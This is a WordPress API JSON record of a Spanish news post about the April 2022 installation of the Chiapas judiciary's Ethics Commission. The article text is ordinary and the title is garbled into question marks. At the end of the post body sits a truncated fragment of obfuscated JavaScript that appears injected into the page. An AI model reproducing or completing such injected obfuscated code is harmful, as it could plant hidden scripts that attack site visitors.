{"id":1244,"date":"2022-04-11T22:08:32","date_gmt":"2022-04-11T22:08:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1244"},"modified":"2022-04-11T22:08:33","modified_gmt":"2022-04-11T22:08:33","slug":"%f0%9d%90%88%f0%9d%90%a7%f0%9d%90%ac%f0%9d%90%ad%f0%9d%90%9a%f0%9d%90%a5%f0%9d%90%9a%f0%9d%90%a7-%f0%9d%90%82%f0%9d%90%a8%f0%9d%90%a6%f0%9d%90%a2%f0%9d%90%ac%f0%9d%90%a2%f0%9d%90%a8%f0%9d%90%a7","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1244","title":{"rendered":"???????? ???????\u0301? ?? ?\u0301???? ??? ????? ???????? ??? ??????"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649714753891-1024x683.jpg\" alt=\"\" class=\"wp-image-1245\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649714753891-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649714753891-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649714753891-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649714753891.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>11 de Abril del 2022. Tuxtla Guti\u00e9rrez, Chiapas. &#8211; Fortaleciendo la pr\u00e1ctica de conductas y actividades en la administraci\u00f3n p\u00fablica que generen progresos en los est\u00e1ndares de desempe\u00f1o profesional y optimizando las funciones de la administraci\u00f3n e impartici\u00f3n de justicia, se realiz\u00f3 la instalaci\u00f3n de la Comisi\u00f3n de \u00c9tica del Poder Judicial del Estado de Chiapas.<\/p>\n\n\n\n<p>Estando reunidos en la Sala de Presidentes y despu\u00e9s de pasar lista para verificaci\u00f3n de Quorum Legal, el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Juan \u00d3scar Trinidad Palacios tom\u00f3 protesta de Ley a las y los integrantes de la Comisi\u00f3n de \u00c9tica de esta casa de la justicia.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, Trinidad Palacios hizo un llamado en\u00e9rgico a quienes integran la familia judicial, para continuar impulsado la conducta lejos de pr\u00e1cticas que laceran a la sociedad y atentan contra la instituci\u00f3n.<\/p>\n\n\n\n<p>Llam\u00f3 a observar y practicar los principios contemplados en el C\u00f3digo de \u00c9tica Judicial y dar certeza a las y los justiciables.<br>Posteriormente, la consejera de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores asever\u00f3 que para el Poder Judicial la \u00e9tica judicial constituye uno de los ejes sobre los cuales versa la impartici\u00f3n de justicia; por otra parte, la din\u00e1mica social y transparencia con la que se debe conducir las instituciones para generar mayor confianza entre la ciudadan\u00eda convergen la imperiosa necesidad con personas servidoras p\u00fablicas comprometidas con valores y virtudes afines a la instituci\u00f3n.<\/p>\n\n\n\n<p>La Comisi\u00f3n de \u00c9tica qued\u00f3 formalmente constituida y encabezada por el magistrado presidente del Poder Judicial del Estado, Juan \u00d3scar Trinidad Palacios; la consejera de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores; el magistrado presidente del Pleno de Distrito, Guillermo Ramos P\u00e9rez; el magistrado coordinador de Visitadur\u00eda, Raquel Cal y Mayor Franco y la secretaria t\u00e9cnica del Consejo de la Judicatura, Karina Mac\u00edas Ozuna.<\/p>\n\n\n\n<p>Luego de ser instalado el Comit\u00e9 de \u00c9tica se llev\u00f3 a cabo la Primera Sesi\u00f3n Ordinaria donde se aprob\u00f3 el Calendario de Sesiones de esta Comisi\u00f3n, as\u00ed como el Plan de Trabajo, ambas para el ejercicio 2022; adem\u00e1s, acordaron la realizaci\u00f3n de la difusi\u00f3n de las nuevas funciones del Comit\u00e9. As\u00ed mismo, expresaron que el plan de trabajo se encuentra dise\u00f1ado en tres ejes: Capacitaci\u00f3n, Difusi\u00f3n y Sensibilizaci\u00f3n a trav\u00e9s de tres \u00e1reas: Comunicaci\u00f3n Social, Instituto de Profesionalizaci\u00f3n y Carrera Judicial y Mejora Regulatoria.<\/p>\n\n\n\n<p>Durante este evento estuvieron como invitados especiales el magistrado presidente del Tribunal Electoral del Estado de Chiapas, Gilberto de G. Batiz; la presidenta del Tribunal Administrativo del Estado, Susana Sarmiento L\u00f3pez; la presidenta del Comit\u00e9 Coordinador del Sistema estatal Anticorrupci\u00f3n, Ana Lilia Cari\u00f1o Sarabia; la secretaria t\u00e9cnica de la Secretar\u00eda Ejecutiva del Sistema Estatal anticorrupci\u00f3n, Dayanhara Aguilar Ballinas; adem\u00e1s de directores, directoras y jefes de unidades del Poder Judicial.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">PJEChiapas<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">JusticiaParaTodosyTodas<\/h1>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>11 de Abril del 2022. Tuxtla Guti\u00e9rrez, Chiapas. &#8211; Fortaleciendo la pr\u00e1ctica de conductas y actividades en la administraci\u00f3n p\u00fablica que generen progresos en los est\u00e1ndares de desempe\u00f1o profesional y optimizando las funciones de la administraci\u00f3n e impartici\u00f3n de justicia, se realiz\u00f3 la instalaci\u00f3n de la Comisi\u00f3n de \u00c9tica del Poder Judicial del Estado de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1245,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1244","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1244","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1244"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1244\/revisions"}],"predecessor-version":[{"id":1246,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1244\/revisions\/1246"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1245"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1244"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1244"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}